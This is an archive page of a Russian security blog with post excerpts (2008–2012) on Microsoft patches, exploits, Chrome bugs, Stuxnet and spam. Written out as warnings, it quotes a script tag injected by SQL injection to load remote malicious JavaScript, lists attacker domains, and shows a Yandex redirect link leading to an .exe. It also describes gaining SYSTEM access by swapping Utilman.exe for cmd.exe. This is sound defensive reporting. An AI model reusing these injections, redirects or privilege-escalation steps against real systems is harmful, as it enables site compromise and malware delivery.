Личные блоги
Валерий Марчук
Блог посвящен безопасности и жизни секлаба
Архив
-
Поиск
26.09.2012
Загадка CVE-2012-2897 или Google исправила вектор эксплуатации уязвимости в MS Windows
Сегодня Google выпустила исправления к Google Chrome (вышла версия 22.0.1229.79).
Примечательно, что $5000 они заплатили исследователю, за обнаружение критической уязвимости в ядре Microsoft Windows.
Microsoft пока молчит. Ждем новый патч… Пока не будут известны подробности этой уязвимости мы воздержимся от публикации уведомления безопасности.
27.04.2012
Эксплоит к MS12-024 / Bloodhound.Exploit.452
Два дня тому Symantec добавил в базу вредоносного ПО описание для эксплоита, использующего уязвимость CVE-2012-0151, устраненную в апрельском патче. Эксплоит определяется эвристикой Symantec как Bloodhound.Exploit.452 (Exploit:Win32/CVE-2012-0151.B - Microsoft). Всем, кто еще не успел поставить патч MS12-024 пора это сделать.
Ссылки на исправления доступны в описании уязвимости по адресу:
http://www.securitylab.ru/vulnerability/422980.php
24.04.2012
Прими участие в акции и сообщи о себе спамерам из TurboSMS
«TurboSMS – ускоритель вашего бизнеса» - такой слоган на сайте компании, у которой есть своя торговая марка. Как сообщается на сайте (не буду давать ссылку на сайт) честно и открыто:
ЦитатаTurboSMSпри сотрудничестве с сетью приёма платежей QIWI провели акцию «Поповнюй телефон-отримай iPhone!»… В результате мы собрали базу потенциальных клиентов с терминалов: номер телефона и город, в котором его пополняли. Уже сейчас Вы можете оформить заявку на свежую базу мобильных номеров Ваших потенциальн...
15.03.2012
Рабочий эксплоит к MS12-020 (обновлено)
На китайских сайтах появились первые сообщения о функциональном эксплоите к уязвимости CVE-2012-0002, которая позвоялет выполнить произвольный код на целевой системе. В качестве доказательства демонстрируется скриншот с примером эксплуатации уязвимости.
Замечен по адресу http://www.forgeting.com/archives/601.html
Я рекомендую всем немедленно установить патч MS12-020, либо применить временное решение, описанное по адресу http://blogs.technet.com/b/srd/archive/2012/03/13/cve-2012-0002-a-closer...
14.03.2012
Патч MS12-020, возможен червь?
Вчера Microsoft выпустила плановые исправления безопасности, среди которых описана потенциально опасная уязвимость в RDP. Многие СМИ и эксперты по безопасности уже спрогнозировали появление нового червя для Windows систем.
Давайте более подробно рассмотрим исправление безопасности MS12-020.
Итак, в бюллетене было устранено 2 уязвимости CVE-2012-0002 (выполнение произвольного кода) и CVE-2012-0152 (отказ в обслуживании).
Беглый анализ патча к CVE-2012-0002 для Windows XP показал след...
28.02.2012
Появились эксплоиты к уязвимостям в Microsoft Visio Viewer (MS12-015)
Сегодня Symantec добавила в свои базы 3 новых описания вредоносного ПО, эксплуатирующего уязвимости в Microsoft Visio Viewer: CVE-2012-0019 (Bloodhound.Exploit.453), CVE-2012-0020 (Bloodhound.Exploit.454) и CVE-2012-0136 (Bloodhound.Exploit.455).
В MS Malware Protection Center сигнатуры для ПО, эксплуатирующего эти уязвимости были опубликованы 22 февраля (обновление 1.121.137.0) и проходят под именами Exploit:Win32/CVE-2012-0019, Exploit:Win32/CVE-2012-0020 и Exploit:Win32/CVE-2012-0136...
18.10.2011
Атака на ASP.NET сайты - заражено более 1 млн. страниц
Для заражения сайтов злоумышленники используют SQL-инъекцию. После удачной эксплуатации уязвимости, злоумышленники подключают вредоносный файл urchin.js с внешнего сервера. Вследствие компрометации в базу данных приложения внедряется следующий код:
Код
<script src=http://<DOMAIN>/urchin.js></script>
Вот список адресов, которые были замечены в атаке
94.102.52.27 (недоступен)
nbnjkl.com (146.185.248.3 - активен)
jjghui.com (недост...
03.06.2011
Просмотр порнофильмов с помощью Яндекс
Как многие знают, Яндекс открыл поисковый сервис видео материалов - video.yandex.ru. Особенность этого сервиса состоит в том, что пользователь может просмотреть видео, не покидая сайт Яндекса. К сожалению, не существует никакой фильтрации видео материалов.
Поиск по слову «секс» дал весьма неожиданные результаты - несколько порнороликов на первой странице Яндекса:
Родителям рекомендую запретить детям пользоваться этим поисковиком.
06.05.2011
Подробности RTF эксплоита Laden's Death.doc
Поскольку на этой неделе весьма популярной темой для СМИ оказалось убийство Усами бин Ладена, вирусописатели не оставили без внимания такое событие. Для достижения своей цели была избрана уязвимость при обработке RTF файлов в Microsoft Office, исправленная в ноябре 2010 года в бюллетене безопасности MS01-087 (CVE-2010-3333). Атака проводилась целенаправленно в виде именной email рассылки. Полученное письмо содержало вредоносный файл Laden's Death.doc.
Характеристика файла Laden's Death.doc
...
01.03.2011
Забавная уязвимость в libpam-pgsql или насколько важно иметь правильный IP
Когда выходит оригинальная новость, непременно хочется поделиться ею с кем-то. Сегодня – это уязвимость в libpam-pgsql. Сама по себе уязвимость сложна в эксплуатации и не интересна с этой точки зрения. Но вот природа ошибки довольно забавна. Заключается она в том, что в файле src/backend_pgsql.c вызывается функция pg_execParam(), которая содержит следующий код:
Код
/* Make IP string */
raddr = malloc(16);
&nbs...
20.07.2010
Как найти XSS уязвимости на сайте nasa.gov
Загрузка плеера
window.bxPlayerOnloadbx_flv_player_15274 = function(config)
{
if (typeof config != 'object')
config = {'file':'/upload/nasa-xss.mp4','height':'480','width':'640','dock':true,'id':'bx_flv_player_15274','controlbar':'bottom','players':[{'type':'html5'},{'type':'flash','src':'/bitrix/components/bitrix/player/mediaplayer/player'}],'logo.hide':'true','skin':'/bitrix/components/bitrix/player/mediaplayer/skins/bitrix.swf','repeat':'N','bufferlength':'10','abouttext':'1С-Битрикс: Мед...
20.07.2010
Еще один 0-day в Microsoft Windows или Stuxnet атакует (Update 2)
Несмотря на вектор распространения, новый червь, эксплуатирующий уязвимость при обработке ярлыков, становится очень популярным. Казалось бы, что подобному вектору распространения вредоносного ПО давно должен был прийти конец. Ведь черви подобным образом распространяются еще со времен Elk Cloner (1982 год). И теперь, 28 лет спустя, мы видим тот же вектор атаки, только скорость и масштабы заражения гораздо выше.
Хронология событий:
10.07.2010
Белорусская антивирусная компания VirusBlokAda (VBA) с...
04.05.2010
Вышло исправление к уязвимости в Microsoft Producer 2003 (MS10-016)
Сегодня Microsoft обновила бюллетень безопасности MS10-016, включив в него исправление для Microsoft Producer 2003 (CVE-2010-0265).
Патч доступен по адресу:
http://www.microsoft.com/downloads/details.aspx?familyid=1b3c76d5-fc75-4f99-94bc-784919468e73
Подробное описание уязвимости:
http://www.securitylab.ru/vulnerability/391519.php
Окно уязвимости – 56 дней
27.04.2010
Вышел новый Snort 2.8.6!
Вот и наступил праздник для всех поклонников Snort, наконец-то вышел официальный релиз популярной IDS.
Что нового?
HTTP Inspect теперь разделяет запросы на 5 компонентов:
Method
URI
Header (non-cookie)
Cookies
Body
Теперь контекстные и PCRE опции правила могут применяться к каждому из этих буферов.
Добавлены HTTP конфигурации для нормализации HTTP заголовка и файлов куки.
Добавлена поддержка gzip для различных пакетов
Добавлен препроцессор Sensitive Data
Препроцессор осуществляет обнару...
02.01.2010
Зависание Spamassasin или с Новым 2010
Казалось бы, что проблема с обработкой дат была исправлена еще 10 лет тому, когда все СМИ с ужасом описывали проблему 2000 года. Никто не мог даже представить, что 2010 год также может преподнести нам сюрприз.
Как сообщается в SA Bug 6269, правило, существующее по умолчанию, FH_DATE_PAST_20XX соответствует каждому входящему письму.
Ошибка уже устранена и должна быть доступна через sa-update.
Также многие могут наблюдать на Unix системах до конца этой недели неожиданный вывод команды date '+...
21.10.2009
Новые комментарии на SecurityLab.ru
Сегодня мы ввели новый интерфейс комментариев на SecurityLab.ru. Теперь каждый зарегистрированный пользователь сможет оценить комментарии других посетителей сайта. Также добавлены дополнительные опции по сокрытию комментариев. Зарегистрированные пользователи смогут скрыть комментарии с низким рейтингом и скрыть комментарии от анонимных пользователей.
Также усиливаются методы автоматического блокирования комментариев для анонимных пользователей. Все эти методы не распространяются на зарегистриро...
07.07.2009
Защита от 0-day в Microsoft DirectShow (обновлено v2)
Вчера мы опубликовали уведомление, описывающее уязвимость в Microsoft DirectShow MPEG2TuneRequest ActiveX компоненте. В настоящий момент уязвимость активно эксплуатируется хакерами.
Список доменов, используемых при эксплуатации уязвимости:
Код
vip762.3322.org
3b3.org
www.27pay.com
www.hao-duo.com
dump.vicp.cc
64tianwang.com
webxue38.3322.org
556622.3322.org
jfg1.3322.org
df56y.3322.org
javazhu.3322.org
8dfgdsgh.3322.org
ceewe3w2.cn
js.tongji.linezing.com
h65uj.8866.org
45hrtt.8...
14.05.2009
Среда без ребутов или черный день для вендоров (аналитика)
Вот уже несколько лет подряд я с нетерпением ожидаю второй вторник месяца Именно в этот вторник секюрити-сообщество просматривает уведомления безопасности и анализирует свежеиспеченные патчи. Активная работа для специалистов по безопасности продолжается и в среду (по МСК). В этот день нас порадовал не только Microsoft, устранив 14 уязвимостей в PowerPoint, но и Adobe и Apple.
Итак, начнем с Microsoft.
Мне почему-то захотелось посчитать количество времени, которое производители потратили на вы...
30.04.2009
Microsoft внесла изменения в уведомления MS08-069, MS08-076 и MS09-012
Вчера Microsoft внесла изменения в бюллетени безопасности MS08-069, MS08-076 и MS09-012.
MS08-069 – в список уязвимых приложений добавлены Microsoft XML Core Services 4.0 для Windows Vista SP2 и Windows Server 2008 SP2
MS08-076 – в список уязвимых приложений добавлено Windows Media Services 2008 для Windows Server 2008 SP2
MS09-012 – Добавлен Windows 2000 к списку уязвимых ОС, повторно выпущено исправление для Норвежской версии ОС.
Мы внесли соответствующие изменения в описание уязвимостей. Их ...
29.04.2009
IE8 стал обязательным обновлением
С сегодняшнего дня Internet Explorer 8 является обязательным обновлением на сайте Windows Update и относится к высокоприоритетным установкам, как все исправления безопасности.
Пришло время IE8, и наверное это хорошо. На данный момент в IE8 не обнаружено ни одной уязвимости и это самый безопасный браузера на сегодня.
Согласно статистике SecurityLab, 9.4% посетителей все еще используют IE6, 14.3% - IE7. Судя по всему, эти цифры скоро поменяются в пользу IE8.
17.04.2009
Подозрительные события в Event Log: lQPxf2ISQgEV1bGK
В боге SANS опубликован интересный пост, сообщающий о необычной активности от удаленной системы с именем lQPxf2ISQgEV1bGK. События в журналах на различных системах сообщают об удачных и неудачных попытках аутентификации. Как правило, в случае удачной попытки, системе с именем lQPxf2ISQgEV1bGK предоставляются привилегии гостевой учетной записи.
Событие из event log на Windows 2003:
Цитатаsecurity: failure - 2009/04/16 10:32:10 - Security (529) - NT AUTHORITY_SYSTEM "Logon Failure: Reason:...
10.04.2009
Новые данные по Win32/Conficker
Jimmy Kuo, MMPC
Перевод SecurityLab.ru
За прошедшие несколько дней были осуществлены некоторые изменения на арене Conficker. Мы бы хотели сообщить всем, кому это интересно, что MMPC работает над тем, чтобы во первых, у вас были все данные, которые необходимы для защиты от любой угрозы, во вторых чтобы вы хорошо понимали саму угрозу.
Нам стало известно о двух новых бинарных файлах. Мы бы хотели сообщить, что продукты Microsoft, такие как Windows Live OneCare, Windows Live OneCare и семейство Fo...
21.01.2009
Доступны видеоматериалы конференции HITBSecConf2008 - Malaysia
Все желающие могут скачать и посмотреть видеоматериалы конференции HITBSecConf2008, которая проходила в Малайзии.
День первый:
http://thepiratebay.org/torrent/4654588/HITBSecConf2008_-_Malaysia_Videos___Day_1
Ключевые выступления:
The Art of Click-Jacking - Jeremiah Grossman
Cyberwar is Bullshit - Marcus Ranum
Презентации:
- Delivering Identity Management 2.0 by Leveraging OPSS
- Bluepilling the Xen Hypervisor
- Pass the Hash Toolkit for Windows
- Internet Explorer 8 - Trustworthy Engineeri...
30.12.2008
Вышла новая версия Inguma 0.1.0 R1
Inguma – это бесплатный набор инструментов для проведения испытаний на проникновение и обнаружения уязвимостей. Написан полностью на python. Включает в себя модули для обнаружения хостов, сбора данных, инструменты для фаззинга, брутфорса по именам пользователей и паролям, некоторые эксплоиты и дизассемблер.
В новой версии представлены следующие нововведения:
OpenDis Binary Navigator – навигатор по исполняемым файлам
PCAP Fuzzer – утилита для сбора данных в PCAP формате и автоматического фаз...
28.12.2008
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
NMAP - легендарный сетевой сканер. Все, кто когда-либо интересовались сетевой безопасностью, пользовались и продолжают пользоваться им. Сам NMAP и его создатель Fyodor (в народе именуемый «Дядей Федей») не нуждаются в представлении.
После нескольких лет работы доступна книга Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (ISBN 978-0-9799587-1-7) – самое полное руководство по использованию nmap.
Около половины содержимого книги доступно по ...
12.12.2008
MSIE 0-day теперь распространяется через SQL инъекцию (обновлено)
Мы уже много писали об уязвимости нулевого дня в Internet Explorer. В этой заметке я хочу собрать все данные в одно целое и поделиться некоторыми наблюдениями.
Публикации на тему уязвимости:
Выполнение произвольного кода в Microsoft Internet Explorer
Анализ уязвимости «нулевого дня» в Microsoft Internet Explorer
Уязвимость нулевого дня в Microsoft Internet Explorer
Эксплоит к последней уязвимости в IE7 был ошибочно опубликован в форуме
Vulnerability in Internet Explorer Could Allow Remote Code...
06.10.2008
Локальный взлом Windows Vista
Компания Offensive Security опубликовала видео, демонстрирующее повышение привилегий на Windows Vista. Локальный пользователь может с помощью Live CD получить привилегии System на системе.
Using BackTrack to pwn Windows Vista
На этом видео атакующий использует LiveCD для подмены файла C: Windows System32 Utilman.exe файлом cmd.exe.
Utilman.exe - Windows Utility Manager, инструмент для управления пользовательскими свойствами.
Затем злоумышленник перезагружается в Windows Vista и использует ко...
26.09.2008
Спам со ссылкой на Яндекс
Сегодня получил спам следующего содержания:
Цитата
Привет
Глянь мои новые ню фоты и видео, уверана оцениш
лицам до 18 лет вход воспрещен
выложила только вчера
mail.yandex.ru/%72?url=http://warmymusic.com.ar/new_fotos.exe
Целую,
Твоя Марина
Как вы видите, используется механизм перенаправления на сайте Яндекса и пользователь перенаправляется на сайт warmymusic.com.ar. Будте осторожны и всегда проверяйте URL перед нажатием на него.
16.09.2008
Активная эксплуатация уязвимости в Microsoft Media Encoder ActiveX компоненте (MS08-053)
Symantec сообщил об обнаружении активной эксплуатации уязвимости в Microsoft Media Encoder ActiveX компоненте, описанной в бюллетене безопасности MS08-053.
Хронология событий:
9 сентября – выход бюллетеня безопасности от Microsoft
13 сентября – эксплоит находится в публичном доступе
15 сентября – ханипоты Symantec зафиксировали активную эксплуатацию уязвимости
По данным Symantec, эксплоит распространяется двумя путями:
В открытом виде, т.е. используется общедоступный шеллкод;
Кодированный ше...
08.09.2008
Наше будущее: реверсивные вишинг атаки
Вишинг атаки в последнее время становятся все более популярными среди злоумышленников.
Вишинг (Vishing == VoIP Phishing) – атака с использованием элементов социальной инженерии и VoIP для получения доступ к личным данным пользователей. Обычными рекомендациями против таких атак являются:
1. Проверка подлинности номера телефона компании, как правило, через Web сайт компании.
2. Перезвонить в компанию напрямую, чтобы быть уверенным, что вам звонят именно из этой компании.
На прошлой неделе Websen...
05.09.2008
И еще один DoS в Google Chrome (Обновлено)
Обнаружена очередная ошибка в браузере Google Chrome. На это раз, уязвимость существует из-за недостаточной проверки входных данных в имени файла в HTTP заголовке Content-Disposition.
PoC код:
Google Chrome Browser 0.2.149.27 (1583) Remote Silent Crash PoC
Для автоматическоо закрытия браузера без каких-либо предупреждений достаточно отправить файл, длина имени которого около 1000 символов. Для появления окна с ошибкой и аварийного завершения работы браузера достаточно 300 символов в имени файл...
03.09.2008
Очередная уязвимость в Google Chrome Browser
Ажиотаж вокруг нового браузера от компании Google не спадает. Вчера Google анонсировала первую beta версию своего браузера, а сегодня уже есть 3 уязвимости
Первая, о которой я писал раньше, позволяет удаленному пользователю аварийно завершить работу браузера.
Вторая уязвимость, которую описал Авив Рафф, позволяет злоумышленнику выполнить произвольный файл на системе.
И третья, PoC код к которой был только что опубликован на секлабе, позволяет злоумышленнику без уведомления пользователя загру...
03.09.2008
Первый DoS в Google Chrome Browser
Итак, через несколько часов после релиза первой бета версии, Rishi Narang сообщил о первой обнаруженной ошибки в новом браузере от Google. Конечно же, наличие ошибок в бета версиях – вещь самая обычная, и в багтраки подобные ошибки не попадают, но я подумал, что читателям секлаба будет интересно узнать о факте обнаружения первой ошибки в Chrome
Итак, ссылка на эксплоит:
http://www.securitylab.ru/_download/exploits/2008/chrome/crash.htm
Код эксплоита:
<p>Нажмите здесь
В результате, брау...
20.05.2008
Список доменов, используемых для внедрения злонамеренного кода через SQL инъекции
На shadowserver.org опубликован список доменов, которые используются для внедрения злонамеренного кода на сайты посредством SQL инъекции.
Цитата
www.nihaorr1.com
free.hostpinoy.info
xprmn4u.info
www.nmidahena.com
winzipices.cn
sb.5252.ws
www.aspder.com
www.11910.net
bbs.jueduizuan.com
www.bluell.cn
www.2117966.net
s.see9.us
xvgaoke.cn
www.414151.com
yl18.net
www.kisswow.com.cn
c.uc8010.com
www.ririwow.cn
www.killwow1.cn
www.qiqigm.com
www.wowgm1.cn
www.wowyeye.cn
9i5t.cn
computershello.cn
www.z...
TOP Новости 
14 июня, 2013
Соцсеть готовится к принятию нового антипиратского законопроекта.
14 июня, 2013
Мультфильмы, размещенные в соцсети «ВКонтакте», будут внесены в черный список.
14 июня, 2013
Депутаты нижней палаты парламента одобрили закон в первом чтении.
10 июня, 2013
На видео с презентации новой ОС видно кнопку «Пуск».
18 июня, 2013
В случае принятия соответственных поправок, за их нарушение чиновникам будет грозить до 20 лет лишения...
10 июня, 2013
Вредоносный код отправляет SMS-сообщения на премиум-номера, а также позволяет запускать шпионское ПО,...
11 июня, 2013
Банковский клерк должен был перевести 64,2 евро, однако заснул над клавиатурой.
14 июня, 2013
Брешь позволяет навсегда заблокировать учетную запись пользователя.
10 июня, 2013
В Сети оказалась карта активности американских спецслужб в разных странах.
13 июня, 2013
Спецотдел американской разведки осуществляет компрометацию систем по всему миру.
Уязвимости 18 июня, 2013
17 июня, 2013
14 июня, 2013
13 июня, 2013
11 июня, 2013
10 июня, 2013
07 июня, 2013
06 июня, 2013
05 июня, 2013